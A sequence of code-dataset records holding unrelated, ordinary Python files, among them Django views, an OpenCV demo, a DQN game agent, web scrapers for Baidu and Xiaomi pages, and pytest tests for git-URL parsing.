TABLE_NAME = 'Item'\r\n\r\n def __init__(self, database: Database):\r\n super().__init__(database)\r\n cmd = f'CREATE TABLE IF NOT EXISTS {self.TABLE_NAME}'\r\n columns = \"\"\"(\r\n id VARCHAR(64),\r\n list_name VARCHAR(64),\r\n name VARCHAR(64) NOT NULL,\r\n quantity INT NOT NULL,\r\n \r\n PRIMARY KEY (id, list_name),\r\n FOREIGN KEY (list_name) REFERENCES {} (name) ON DELETE CASCADE ON UPDATE NO ACTION\r\n )\"\"\".format(ShoppingListTable.TABLE_NAME)\r\n with self.db as cur:\r\n cur.execute(cmd + columns)\r\n\r\n def get(self, list_name: Text, iid: Text) -> Optional[Dict[Text, Any]]:\r\n data = self.db.search_unique(self.TABLE_NAME, dict(id=iid, list_name=list_name))\r\n if data is not None:\r\n data = self._convert_query(data)\r\n return data\r\n\r\n def insert(self, list_name: Text, iid: Text, name: Text, quantity: int) -> Dict[Text, Any]:\r\n with self.db:\r\n self.db.insert(self.TABLE_NAME, dict(id=iid, list_name=list_name, name=name, quantity=quantity))\r\n return self.get(list_name, iid)\r\n\r\n def delete(self, list_name: Text, iid: Text) -> NoReturn:\r\n self.db.delete(self.TABLE_NAME, dict(id=iid, list_name=list_name))\r\n\r\n def update(self, list_name: Text, iid: Text, quantity: int) -> NoReturn:\r\n self.db.update(self.TABLE_NAME, dict(quantity=quantity), dict(list_name=list_name, id=iid))\r\n\r\n def add_quantity(self, list_name: Text, iid: Text, name: Text, amount: int) -> Dict[Text, Any]:\r\n with self.db:\r\n item = self.get(list_name, iid)\r\n if item is None:\r\n return self.insert(list_name, iid, name, amount)\r\n self.update(list_name, iid, item['quantity'] + amount)\r\n return self.get(list_name, iid)\r\n\r\n def remove_quantity(self, list_name: Text, iid: Text, amount: int) -> Optional[Dict[Text, Any]]:\r\n with self.db:\r\n item = self.get(list_name, iid)\r\n if item is None:\r\n return None\r\n\r\n new_quantity = item['quantity'] - amount\r\n if new_quantity <= 0:\r\n self.delete(list_name, iid)\r\n return None\r\n self.update(list_name, iid, new_quantity)\r\n return self.get(list_name, iid)\r\n\r\n def set_quantity(self, list_name: Text, iid: Text, name: Text, amount: int) -> Any:\r\n with self.db:\r\n item = self.get(list_name, iid)\r\n if item is None:\r\n return self.insert(list_name, iid, name, amount)\r\n self.update(list_name, iid, amount)\r\n return self.get(list_name, iid)\r\n\r\n def all(self) -> List[Dict[Text, Any]]:\r\n data = self.db.all(self.TABLE_NAME)\r\n return ShoppingList(list(map(self._convert_query, data)))\r\n\r\n @staticmethod\r\n def _convert_query(data: Tuple[Text, Text, Text, int]):\r\n return dict(id=data[0], list_name=data[1], name=data[2], quantity=data[3])\r\n\r\nclass ShoppingList:\r\n def __init__(self, data):\r\n self.data = data\r\n \r\n def __str__(self):\r\n if len(self.data) == 0:\r\n return \"Your shopping list is empty.\"\r\n else:\r\n title = '# -------- SHOPPING LIST -------- #\\n'\r\n rows = (f'{item[\"name\"]:>18s} - {item[\"quantity\"]}' for item in self.data)\r\n return title + '\\n'.join(rows)\r\n","sub_path":"scripts/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":7165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"170122080","text":"import numpy as np\nimport cv2\n\nix, iy = -1, -1\nmode = False\nimg1, img2 = None, None\n\ndef onMouse(event, x, y, flag, param):\n global ix, iy, mode, img1, img2\n\n if event == cv2.EVENT_LBUTTONDOWN:\n mode = True\n ix, iy = x, y\n elif event == cv2.EVENT_MOUSEMOVE:\n if mode:\n img1 = img2.copy()\n cv2.rectangle(img1, (ix, iy), (x,y), (0,0,255), 2)\n cv2.imshow('original', img1)\n elif event == cv2.EVENT_LBUTTONUP:\n mode = False\n if ix >= x:\n temp = ix\n ix = x\n x = temp\n if iy >= y:\n temp = iy\n iy = y\n y = temp\n\n cv2.rectangle(img1, (ix, iy), (x, y), (0,0,255), 2)\n roi = img1[iy:y, ix:x]\n backProjection(img2, roi)\n\n return\n\ndef backProjection(img, roi):\n hsv = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)\n hsvt = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n roihist = cv2.calcHist([hsv], [0,1], None, [180,256], [0,180, 0,256])\n cv2.normalize(roihist, roihist, 0, 255, cv2.NORM_MINMAX)\n dst = cv2.calcBackProject([hsvt], [0,1], roihist, [0,180, 0,256], 1)\n\n disc = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (5,5))\n #disc = cv2.getStructuringElement(cv2.MORPH_CROSS, (5,5))\n #disc = np.ones((3,3), np.uint8)\n cv2.filter2D(dst, -1, disc, dst)\n\n ret, thr = cv2.threshold(dst, 50, 255, 0)\n thr = cv2.merge((thr,thr, thr))\n res = cv2.bitwise_and(img, thr)\n\n cv2.imshow('backproj', res)\n\ndef main():\n global img1, img2\n\n img1 = cv2.imread('E:/Python_Study/OpenCV/images/model.jpg')\n img2 = img1.copy()\n\n cv2.namedWindow('original')\n cv2.namedWindow('backproj')\n\n cv2.setMouseCallback('original', onMouse, param=None)\n\n cv2.imshow('backproj', img2)\n\n while True:\n cv2.imshow('original', img1)\n\n if cv2.waitKey(1) == 27:\n break\n\n cv2.destroyAllWindows()\n\nmain()","sub_path":"OpenCV/Ex27-1.ImageProjection.py","file_name":"Ex27-1.ImageProjection.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"609685869","text":"# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Ericsson.SEOS.get_version\n# ---------------------------------------------------------------------\n# Copyright (C) 2007-2017 The NOC Project\n# See LICENSE for details\n# ---------------------------------------------------------------------\n\n# Python modules\nimport re\n# NOC modules\nfrom noc.core.script.base import BaseScript\nfrom noc.sa.interfaces.igetversion import IGetVersion\n\n\nclass Script(BaseScript):\n name = \"Ericsson.SEOS.get_version\"\n cache = True\n interface = IGetVersion\n\n rx_ver = re.compile(r\"^Active SBL\\s+:\\s+CXP:\\s+(?P\\S+.*)\\s+\"\n r\"^Passive (?:NPU|SBL)\\s+:\\s+CXP:\\s+[\\S\\s]+\"\n r\"^Active BNS\\s+:\\s+CXCR:\\s+(?P\\S+.*)$\",\n re.MULTILINE)\n\n def execute(self):\n ver = self.cli(\"show version\", cached=True)\n for match in self.rx_ver.finditer(ver):\n version = match.group(\"version\")\n sw_backup = match.group(\"sw_backup\")\n return {\n \"vendor\": \"Ericsson\",\n \"platform\": \"SEOS\",\n \"version\": version,\n \"attributes\": {\n \"sw_backup\": sw_backup\n }\n }\n","sub_path":"sa/profiles/Ericsson/SEOS/get_version.py","file_name":"get_version.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"224811813","text":"from django import forms\nfrom django.forms.forms import ErrorDict, NON_FIELD_ERRORS\nfrom django.forms.widgets import EmailInput, CheckboxInput\n\n\nclass DynamicErrorForm(forms.Form):\n def add_form_error(self, message):\n if not self._errors:\n self._errors = ErrorDict()\n if not NON_FIELD_ERRORS in self._errors:\n self._errors[NON_FIELD_ERRORS] = self.error_class()\n self._errors[NON_FIELD_ERRORS].append(message)\n\n\nclass CompetitionForm(DynamicErrorForm):\n\n HYLANDS_PARK = 'HP'\n WESTON_PARK = 'WP'\n VENUE_CHOICES = [\n (HYLANDS_PARK, \"HYLANDS PARK\"),\n (WESTON_PARK, \"WESTON PARK\"),\n ]\n\n def __init__(self, module, *args, **kwargs):\n super(CompetitionForm, self).__init__(*args, **kwargs)\n answer_choices = [\n ('Answer1', module.answer_1),\n ('Answer2', module.answer_2),\n ('Answer3', module.answer_3),\n ]\n self.fields['answer'] = forms.ChoiceField(answer_choices,\n widget=forms.RadioSelect())\n\n name = forms.CharField(label='Name', max_length=100)\n email = forms.EmailField(label='Email', widget=EmailInput(attrs={'class': 'panel--competition__email-signup'}))\n mobile = forms.CharField(label=\"Mobile\")\n postcode = forms.CharField(label=\"Postcode\", max_length=10)\n venue = forms.ChoiceField(choices=VENUE_CHOICES, widget=forms.RadioSelect())\n terms = forms.BooleanField(widget=CheckboxInput(attrs={'class': 'panel--competition__terms'}))\n","sub_path":"django/vfestival/apps/competition/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"248532368","text":"from django.shortcuts import render, redirect, HttpResponse\nfrom app01.models import *\n\n\n# Create your views here.\ndef add_book(request):\n \"\"\"\n 添加书籍信息的视图函数\n :param request:\n :return:\n \"\"\"\n if request.POST:\n title = request.POST.get(\"title\")\n price = request.POST.get(\"price\")\n date = request.POST.get(\"date\")\n publish = request.POST.get(\"publish\")\n authors = request.POST.getlist('authors')\n book_obj = Book.objects.create(title=title, price=price, pub_date=date, publish_id=publish)\n book_obj.authors.add(*authors)\n return redirect('app01:books')\n\n pub_list = Publish.objects.all()\n aut_list = Author.objects.all()\n\n return render(request, 'add_book.html', {'pub_list': pub_list, 'aut_list': aut_list})\n\n\ndef mod_book(request, id):\n mod_obj = Book.objects.filter(nid=id).first()\n if request.POST:\n title = request.POST.get(\"title\")\n price = request.POST.get(\"price\")\n date = request.POST.get(\"date\")\n publish = request.POST.get(\"publish\")\n authors = request.POST.getlist('authors')\n Book.objects.filter(pk=id).update(title=title, price=price, pub_date=date, publish_id=publish)\n mod_obj.authors.set(authors)\n return redirect('app01:books')\n\n pub_list = Publish.objects.all()\n aut_list = Author.objects.all()\n return render(request, 'modbook.html', {'mod_obj': mod_obj, 'pub_list': pub_list, 'aut_list': aut_list})\n\n\ndef books(request):\n book_list = Book.objects.all()\n\n return render(request, 'books.html', {'book_list': book_list})\n\n\ndef del_book(request, id):\n Book.objects.filter(nid=id).delete()\n return redirect('app01:books')\n\n\ndef aut_detail(request, id, tag):\n if tag == \"2\":\n print(id)\n book_list = Book.objects.filter(authors__nid=id).all()\n else:\n book_list = Book.objects.filter(publish_id=id).all()\n return render(request, 'book_detail.html', locals())\n","sub_path":"app01/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"481518194","text":"from flurry.parser import FlurryBlockParser\nfrom django.conf import settings as dj_settings\nfrom exception import FlurryException\nimport settings\nimport utils\nimport mimetypes\nimport json\nimport os\nimport sys\n\n\nclass FlurryResource(object):\n\n def __init__(self):\n self.requires = []\n self.disk = \"\"\n self.type = \"\"\n self.uri = \"\"\n self.module = \"\"\n self.full_uri = \"\"\n self.suggest = []\n self.mime_type = \"\"\n self.provides = \"\"\n self.hash = \"\"\n self.head = False\n\n def getDiskUri(self):\n diskURI = self.disk\n if \"://\" in diskURI:\n diskURI = diskURI.split(\"://\")\n appname = diskURI[0]\n path = diskURI[1]\n uri = utils.get_path_for_application(appname) + \"/static/\" + path\n return uri\n else:\n return diskURI\n\n def renderResourceTag(self):\n uri = self.uri\n if dj_settings.DEBUG is True:\n if len(self.provides) > 0:\n uri += \"?r=\" + self.provides\n if self.type == \"css\":\n return \"\"\n elif self.type == \"js\":\n return \"\"\n else:\n return \"\"\n\n def load(self, data):\n self.requires = data['requires']\n self.disk = data['disk']\n self.type = data['type']\n self.uri = data['uri']\n self.module = data['module']\n self.suggest = data['suggest']\n self.mime_type = data['mime_type']\n self.hash = data['hash']\n if \"provides\" in data:\n self.provides = data['provides']\n self.head = data['head']\n\n def toData(self):\n data = {}\n data['requires'] = self.requires\n data['disk'] = self.disk\n data['type'] = self.type\n data['uri'] = self.uri\n data['suggest'] = self.suggest\n data['mime_type'] = self.mime_type\n data['hash'] = self.hash\n data['module'] = self.module\n data['head'] = self.head\n return data\n\n\nclass FlurryMap(object):\n\n def __init__(self):\n self.resources = {}\n self.resources_disk = {}\n self.resources_uri = {}\n self.resources_tag = {}\n self.modules = {}\n self.packages = {}\n self.new_id = 99999\n\n def loadResource(self, tag, resource):\n self.new_id += 1\n id = str(self.new_id)\n self.resources[id] = resource\n self.resources_disk[resource['disk']] = id\n self.resources_uri[resource['uri']] = id\n self.resources_tag[tag] = id\n\n def getResourceFromDisk(self, diskURI):\n diskURI = utils.get_flurry_new_disk_uri(diskURI)\n return self.getResourceFromFlurryDisk(diskURI)\n\n def getResourceFromFlurryDisk(self, diskURI):\n if diskURI in self.resources_disk:\n id = self.resources_disk[diskURI]\n return self.getResource(id)\n else:\n raise FlurryException(\"Resource Not Found \" + diskURI)\n\n def getResourceFromURI(self, webURI):\n if webURI in self.resources_uri:\n id = self.resources_uri[webURI]\n return self.getResource(id)\n else:\n if webURI in self.packages:\n return self.packages[webURI]\n raise FlurryException(\"Resource Not Found \" + webURI)\n\n def getResourceFromTag(self, tagName):\n if tagName in self.resources_tag:\n id = self.resources_tag[tagName]\n return self.getResource(id)\n else:\n raise FlurryException(\"Resource Not Found: \" + tagName)\n\n def getResources(self):\n data = []\n for i, resource in self.resources.iteritems():\n flurry_resource = FlurryResource()\n flurry_resource.load(resource)\n data.append(flurry_resource)\n return data\n\n def getResource(self, id):\n if str(id) in self.resources:\n resource = self.resources[str(id)]\n flurry_resource = FlurryResource()\n flurry_resource.load(resource)\n return flurry_resource\n else:\n raise FlurryException(\"Resource Not Found: \" + id)\n\n def getModule(self, module):\n if module in self.modules:\n module_depends = self.modules[module]\n return module_depends\n else:\n raise FlurryException(\"Module Not Found\")\n\n\nclass FlurryResourceWritable(FlurryResource):\n\n def __init__(self, diskURI, map_version):\n super(FlurryResourceWritable, self).__init__()\n self.provides = []\n diskURI = diskURI.replace(\"/src/src/\", \"/src/\")\n\n self.disk = diskURI\n\n diskURI = self.getDiskUri()\n\n file_stream = open(diskURI, \"rb\")\n self.hash = utils.md5_for_file(file_stream)\n file_stream.close()\n\n self.file_type = self._getFileType(diskURI)\n if self.file_type in settings.resource_types:\n self.type = settings.resource_types[self.file_type]\n else:\n self.type = \"resource\"\n\n if not self.type == \"js\":\n self.head = True\n\n self.uri = self._getURI(diskURI, map_version)\n self.mime_type = mimetypes.guess_type(self.uri)[0]\n\n if self.type in settings.docblock_types:\n block = FlurryBlockParser()\n block.parseBlock(diskURI)\n self.provides = block.getProvides()\n self.requires = block.getRequires()\n self.suggest = block.getSuggest()\n self.module = block.getModule()\n self.head = block.getHead()\n\n def _getFileType(self, filename):\n x = filename.split(\".\")\n return x[-1]\n\n def _getURI(self, filename, map_version):\n file_type = self._getFileType(filename)\n if file_type in settings.resource_types:\n file_type = settings.resource_types[file_type]\n return \"/rsrc/v1/\" + map_version + \"/r/\" + self.hash[2:10] + \".\" + file_type\n\n def build(self):\n data = self.toData()\n\n all_resources = []\n for provide in self.provides:\n if 'provides' in data:\n del data['provides']\n x = json.loads(json.dumps(data))\n x['provides'] = provide\n all_resources.append(x)\n\n if len(self.provides) == 0:\n data['provides'] = \"\"\n all_resources.append(data)\n\n return all_resources\n\n\nclass FlurryMapReader(FlurryMap):\n\n def __init__(self, filename):\n super(FlurryMapReader, self).__init__()\n\n map_file = open(filename, 'r')\n s_map = \"\"\n while 1:\n line = map_file.readline()\n if not line:\n break\n s_map += line\n map_file.close()\n\n try:\n data = json.loads(s_map)\n self.resources = data['resources']\n self.resources_disk = data['resources_disk']\n self.resources_uri = data['resources_uri']\n self.resources_tag = data['resources_tag']\n self.modules = data['modules']\n self.packages = data['packages']\n except ValueError:\n pass\n\n\nclass FlurryMapWritable(FlurryMap):\n\n def __init__(self, files):\n super(FlurryMapWritable, self).__init__()\n\n map_version = utils.generate_random_string(2)\n id = 1\n\n for resource_file in files:\n sys.stdout.write(\".\")\n resource = FlurryResourceWritable(resource_file, map_version)\n for inner_resource in resource.build():\n id = id + 1\n self.resources[id] = inner_resource\n\n for id, resource in self.resources.iteritems():\n sys.stdout.write(\".\")\n disk = resource['disk']\n self.resources_disk[disk] = id\n uri = resource['uri']\n self.resources_uri[disk] = id\n\n if len(resource['provides']) > 0:\n tag = resource['provides']\n self.resources_tag[tag] = id\n\n if len(resource['module']) > 0:\n for module in resource['module']:\n if not module in self.modules:\n self.modules[module] = []\n self.modules[module].append(tag)\n\n # Build module resources\n for module, resources in self.modules.iteritems():\n id = id + 1\n mod = FlurryResource()\n mod.requires = resources\n mod.type = \"module\"\n self.resources[id] = mod.toData()\n self.resources_tag[module] = id\n\n for module, resources in settings.packages.iteritems():\n uri = \"/rsrc/v1/\" + map_version + \"/r/\" + utils.md5_for_string(module)[2:10] + \".\" + utils.get_file_type(module)\n self.packages[uri] = resources\n\n def __str__(self):\n data = {}\n data['resources'] = self.resources\n data['resources_disk'] = self.resources_disk\n data['resources_uri'] = self.resources_uri\n data['resources_tag'] = self.resources_tag\n data['modules'] = self.modules\n data['packages'] = self.packages\n return json.dumps(data)\n\n def saveToFile(self, filename):\n if os.path.isfile(filename):\n old_map = FlurryMapReader(filename)\n for id, resource in old_map.resources.iteritems():\n for new_id, new_resource in self.resources.iteritems():\n if resource['disk'] == new_resource['disk']:\n if resource['hash'] == new_resource['hash']:\n #old_uri = self.resources[new_id]['uri']\n self.resources[new_id]['uri'] = resource['uri']\n self.resources_uri[resource['uri']] = new_id\n\n self.resources_uri = {}\n for id, resource in self.resources.iteritems():\n self.resources_uri[resource['uri']] = id\n\n map_file = open(filename, 'w')\n map_file.write(str(self))\n map_file.close()\n\n\n","sub_path":"src/flurry/map_model.py","file_name":"map_model.py","file_ext":"py","file_size_in_byte":10036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"519839465","text":"from random import randint\n\nimport alien_invasion.game_functions as gf\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pygame\nimport seaborn as sns\nfrom alien_invasion.game_items import GameItems\nfrom alien_invasion.game_stats import GameStats\nfrom keras.utils import to_categorical\nfrom alien_invasion.settings import Settings\nfrom tqdm import tqdm\nfrom alien_invasion.DQN import DQNAgent\n\n\n# FPS = 60\ndef plot_seaborn(array_counter, array_score):\n sns.set(color_codes=True)\n ax = sns.regplot(np.array([array_counter])[0], np.array([array_score])[0], color=\"b\", x_jitter=.1,\n line_kws={'color': 'green'})\n ax.set(xlabel='games', ylabel='score')\n plt.show()\n\n\ndef run_game():\n FPS = 1000\n\n # Initialize game, settings and create a screen object.\n pygame.init()\n fps_clock = pygame.time.Clock()\n ai_settings = Settings()\n\n # FOR THE DQN #\n\n agent = DQNAgent()\n counter_games = 0\n score_plot = []\n counter_plot = []\n record = 0\n\n # FOR THE DQN #\n\n for i in tqdm(range(1, 150)):\n\n # Create statistics.\n stats = GameStats(ai_settings)\n\n # Create game items.\n game_items = GameItems(ai_settings, stats)\n\n # Create a fleet of aliens.\n gf.create_fleet(ai_settings, game_items)\n played = False\n\n gf.start_new_game(ai_settings, stats, game_items)\n\n # Start the main loop for the game.\n while stats.game_active:\n stats.time_passed = fps_clock.tick(FPS) / 1000 # Time in seconds since previous loop.\n\n gf.check_events(ai_settings, stats, game_items)\n\n if stats.game_active:\n # FOR THE DQN #\n agent.epsilon = 80 - counter_games\n state_old = gf.get_state(ai_settings, stats, game_items)\n if randint(0, 200) < agent.epsilon:\n final_move = to_categorical(randint(0, 3), num_classes=4)\n else:\n # predict action based on the old state\n prediction = agent.model.predict(state_old.reshape((1, 3536)))\n final_move = to_categorical(np.argmax(prediction[0]), num_classes=4)\n # played = True\n\n # FOR THE DQN #\n\n # DQN #\n # perform new move and get new state\n beforeMove = stats.score\n gf.do_move(final_move, ai_settings, stats, game_items)\n game_items.ship.update(stats)\n gf.update_bullets(ai_settings, stats, game_items)\n gf.update_aliens(ai_settings, stats, game_items)\n state_new = gf.get_state(ai_settings, stats, game_items)\n\n reward = agent.set_reward(stats.score,beforeMove, stats.ships_left)\n\n # train short memory base on the new action and state\n agent.train_short_memory(state_old, final_move, reward, state_new, stats.game_active)\n\n # store the new data into a long term memory\n agent.remember(state_old, final_move, reward, state_new, stats.game_active)\n # DQN #\n\n\n gf.update_screen(ai_settings, stats, game_items)\n\n # FOR THE DQN #\n agent.replay_new(agent.memory)\n counter_games += 1\n print('Game', counter_games, ' Score:', stats.score)\n score_plot.append(stats.score)\n counter_plot.append(counter_games)\n agent.model.save_weights('weights.hdf5')\n plot_seaborn(counter_plot, score_plot)\n # FOR THE DQN #\n\n\nif __name__ == '__main__':\n run_game()\n","sub_path":"alien_invasion/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"51532524","text":"import argparse\nimport ConfigParser\nimport os\n\n\ndef compute_config(config_path, section):\n class Foo:\n def __init__(self):\n pass\n config = ConfigParser.ConfigParser()\n config_path = os.path.abspath(config_path)\n config.read(config_path)\n class_ = Foo()\n for item in config.items(section):\n setattr(class_, item[0], item[1])\n return class_\n\n\ndef parse_arguments():\n arg_parser = argparse.ArgumentParser()\n\n arg_parser.add_argument(\n \"-c\", \"--config\",\n help=\"path to the config file\",\n default=os.path.join(\n os.pathsep.join(os.path.abspath(__file__).split(os.pathsep)[:-1]),\n \"config\", \"server.cfg\"\n )\n )\n return arg_parser\n\n\n","sub_path":"config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"66119622","text":"import cs50\n\n# get the height\nwhile True:\n n = cs50.get_int(\"Height: \")\n if n >= 1 and n <= 8:\n break\n# print the pyrimad\nspace = n - 1\n\nfor x in range(n):\n for y in range(space):\n print(\" \", end=\"\")\n\n for z in range(n - space):\n print(\"#\", end=\"\")\n space = space - 1\n print()\n","sub_path":"pset6/Mario.py","file_name":"Mario.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"87632488","text":"from django.conf.urls import url\n\nfrom .views import index, product_detail, category, search\n\nurlpatterns = [\n url(r'^$', index),\n url(r'^index/$', index, name='index'),\n url(r'^product_detail/(?P\\d+)$', product_detail, name='product_detail'),\n url(r'^category/(?P\\d+)$', category, name='category'),\n url(r'^search/$', search, name='search'),\n\n]","sub_path":"store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"553938742","text":"# coding:utf-8\n \nimport re\nimport urllib.request\n \ndef get_content(url):\n \"\"\" Evilxr, \"\"\"\n html = urllib.request.urlopen(url)\n content = html.read().decode('utf-8')\n html.close()\n return content\n \ndef get_images(info):\n \"\"\"\" Download Baidu pictures.\n \n \"\"\"\n regex = r' class=\"BDE_Image\" src=\"(.+?\\.jpg)\" ' #只匹配括号里面的内容\n pat = re.compile(regex)\n images_code = re.findall(pat, info)\n \n i = 0\n for image_url in images_code:\n print (image_url)\n urllib.request.urlretrieve(image_url, '%s.jpg' % i)\n i = i +1\n print (len(images_code))\n \ninfo = get_content(\"http://tieba.baidu.com/p/2299704181\")\nprint (get_images(info))","sub_path":"test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"187274786","text":"#coding:utf-8\n__author__ = '613108'\n\nfrom selenium import webdriver\nfrom threading import Thread\nimport random\nimport time\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\nsys.path.append(r'C:\\Users\\613108\\Desktop\\Project\\tool_self')\nimport My_Csv\n\nresult=[]\n\nclass Get_ProductInfo(Thread):\n def __init__(self,url_list):\n Thread.__init__(self)\n self.url_list=url_list\n\n def get_info(self):\n url_list=self.url_list\n try:\n driver=webdriver.PhantomJS()\n except:\n try:driver=webdriver.Chrome()\n except:pass\n driver.maximize_window()\n # try:\n for url in url_list:\n driver.get(url)\n print(url)\n for i in range(0,400*4,400):\n rand=random.gauss(100,100)\n scroll_height=i+rand\n js_scroll='var q=document.documentElement.scrollTop=%s'%scroll_height\n driver.execute_script(js_scroll)\n time.sleep(abs(random.gauss(1,0.5)))\n goods_frames=driver.find_elements_by_css_selector('.goods-item')\n print(len(goods_frames))\n for item in goods_frames:\n product_href=item.find_element_by_css_selector('.figure>a').get_attribute('href')\n print(product_href)\n # inner_frames=item.find_elements_by_css_selector('.item-info')\n # for item_2 in inner_frames:\n product_title=item.find_element_by_css_selector('.title>a').text\n product_price=item.find_element_by_css_selector('.price').text#.split('|')[0]\n try:product_price_del=item.find_element_by_class_name('.price>del').text#.split('|')[1]\n except:product_price_del='-'\n # try:product_adapt=item_2.find_element_by_class_name('item-adapt').text\n # except:product_adapt='-'\n # judge_count=item_2.find_element_by_class_name('item-comments').text[:-2]\n try:flag=item.find_element_by_css_selector('.flag').text\n except:flag='-'\n temp=[product_title,product_href,product_price,product_price_del,flag]\n result.append(temp)\n print('*'*50)\n for item_3 in temp:\n print(item_3)\n # except:pass\n driver.quit()\n\n def run(self):\n self.get_info()\n\nif __name__=='__main__':\n url_list=['http://list.mi.com/0-0-0-0-'+str(i+1)+'-0' for i in range(60)]\n Get_ProductInfo_thread=[]\n thread_count=10\n for i in range(thread_count):\n temp=Get_ProductInfo(url_list[((len(url_list)+thread_count-1)/thread_count)*i:((len(url_list)+thread_count-1)/thread_count)*(i+1)])\n Get_ProductInfo_thread.append(temp)\n for i in range(len(Get_ProductInfo_thread)):\n Get_ProductInfo_thread[i].start()\n for i in range(len(Get_ProductInfo_thread)):\n Get_ProductInfo_thread[i].join()\n\n title=['product_title','product_href','product_price','product_price_del','flag']\n writer=My_Csv.Write_Csv('d:/spider/xiaomi','xiaomi_product',title,result)\n writer.add_title_data()\n\n print('='*20+u'程序执行完毕,请检查所抓取的数据'+'='*20)","sub_path":"Official_store_project/xiaomi_project/product_info.py","file_name":"product_info.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"387977049","text":"import pytest\nimport pelorus\nfrom committime.collector_base import CommitMetric\n\n\n@pytest.mark.parametrize(\"start_time,end_time,format\",\n [\n ('2020-06-27T03:17:8Z',\n '2020-06-27T06:17:8Z', '%Y-%m-%dT%H:%M:%SZ'),\n ('2020-06-27T03:17:08.00000-0500', '2020-06-27T06:17:08.000000-0500',\n '%Y-%m-%dT%H:%M:%S.%f%z')\n ]\n )\ndef test_convert_date_time_to_timestamp(start_time, end_time, format):\n start_timestamp = 1593227828\n end_timestamp = 1593238628\n three_hours = 10800\n\n calc_start = pelorus.convert_date_time_to_timestamp(start_time, format)\n assert calc_start == start_timestamp\n calc_end = pelorus.convert_date_time_to_timestamp(end_time, format)\n assert calc_end == end_timestamp\n assert calc_end - calc_start == three_hours\n\n\n# Unit tests for the CommitMetric\n@pytest.mark.parametrize(\"appname\", [(\"pytest\")])\ndef test_commitmetric_initial(appname):\n metric = CommitMetric(appname)\n assert metric.repo_url is None\n assert metric.name == appname\n assert metric.repo_protocol is None\n assert metric.git_fqdn is None\n assert metric.repo_group is None\n assert metric.repo_project is None\n\n\n@pytest.mark.parametrize(\"url,repo_protocol,fqdn,project_name\",\n [\n ('https://dogs.git.foo/dogs/repo.git', 'https', 'dogs.git.foo', 'repo'),\n ('http://dogs.git.foo/dogs/repo.git', 'http', 'dogs.git.foo', 'repo'),\n ('http://noabank.git.foo/chase/git.git', 'http', 'noabank.git.foo', 'git'),\n ('ssh://git.moos.foo/maverick/tootsie.git', 'ssh', 'git.moos.foo', 'tootsie'),\n ('git@github.com:redhat-cop/pelorus.git', 'ssh', 'github.com', 'pelorus'),\n ('https://gitlab.com/firstgroup/secondgroup/myrepo.git', 'https', 'gitlab.com', 'myrepo')\n ]\n )\ndef test_commitmetric_repos(url, repo_protocol, fqdn, project_name):\n test_name = 'pytest'\n metric = CommitMetric(test_name)\n metric.name == test_name\n assert metric.repo_url is None\n assert metric.repo_protocol is None\n assert metric.git_fqdn is None\n assert metric.repo_group is None\n assert metric.repo_project is None\n metric.repo_url = url\n assert metric.repo_url is not None\n assert metric.repo_url == url\n assert metric.repo_protocol == repo_protocol\n assert metric.git_fqdn is not None\n assert metric.repo_group is not None\n assert metric.repo_project is not None\n assert metric.git_fqdn == fqdn\n# assert metric.git_server == str(protocol + '://' + fqdn)\n assert metric.repo_project == project_name\n\n\n@pytest.mark.parametrize(\"malformed_url\", [\n \"kmoos://myprotocol/buffy/noext/noext\",\n \"notvalid://breakme/snoopy/gtist.git\"\n])\ndef test_malformed_git_url(malformed_url):\n test_name = 'pytest'\n metric = CommitMetric(test_name)\n metric.name = test_name\n with pytest.raises(ValueError):\n metric.repo_url = malformed_url\n","sub_path":"exporters/test_exporters.py","file_name":"test_exporters.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"375162461","text":"import zipfile\nimport io\n\ndef unzipped(input_zip):\n input_zip = zipfile.ZipFile(io.BytesIO(input_zip))\n return {name: input_zip.read(name) for name in input_zip.namelist()}\n\ndef zipped(input_clear, filename):\n buff = io.BytesIO()\n zip_archive = zipfile.ZipFile(buff, mode=\"w\", compression=zipfile.ZIP_DEFLATED)\n zip_archive.writestr(filename, input_clear)\n zip_archive.close()\n return buff.getvalue()\n","sub_path":"src/zip.py","file_name":"zip.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"537413414","text":"import smtplib\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.base import MIMEBase\nfrom email.mime.text import MIMEText\n#from email import 